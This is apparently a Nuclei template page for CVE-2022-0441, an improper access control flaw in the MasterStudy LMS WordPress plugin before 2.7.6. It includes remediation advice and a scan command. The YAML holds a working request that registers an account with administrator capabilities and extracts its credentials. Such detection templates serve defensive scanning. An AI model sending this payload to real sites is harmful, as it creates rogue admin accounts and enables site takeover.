MasterStudy LMS <2.7.6 - Improper Access Control
ID: CVE-2022-0441
Severity: critical
Author: dwisiswant0,theamanrawat
Tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes
Description
Section titled “Description”WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2022-0441
info: name: MasterStudy LMS <2.7.6 - Improper Access Control author: dwisiswant0,theamanrawat severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity. remediation: | Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue. reference: - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ - https://plugins.trac.wordpress.org/changeset/2667195 - https://nvd.nist.gov/vuln/detail/CVE-2022-0441 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0441 cwe-id: CWE-269,NVD-CWE-Other epss-score: 0.18749 epss-percentile: 0.95799 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: stylemixthemes product: masterstudy_lms framework: wordpress tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemesvariables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json
{"user_login":"{{username}}","user_email":"{{user_email}}","user_password":"{{password}}","user_password_re":"{{password}}","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
matchers-condition: and matchers: - type: word part: body_2 words: - 'Registration completed successfully' - '"status":"success"' condition: and
- type: word part: header_2 words: - application/json;
- type: status status: - 200
extractors: - type: regex name: nonce group: 1 regex: - '"stm_lms_register":"([0-9a-z]+)"' internal: true
- type: kval kval: - user_email - password# digest: 4a0a00473045022100de04257b64828fea8d5aae56b0011808c9acef595cce49810aef0020a55aa0f9022023566b7e3ada57f0617b3d1cdc43a5a7cfde95c87341a5f79ec695b70094584e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0441.yaml"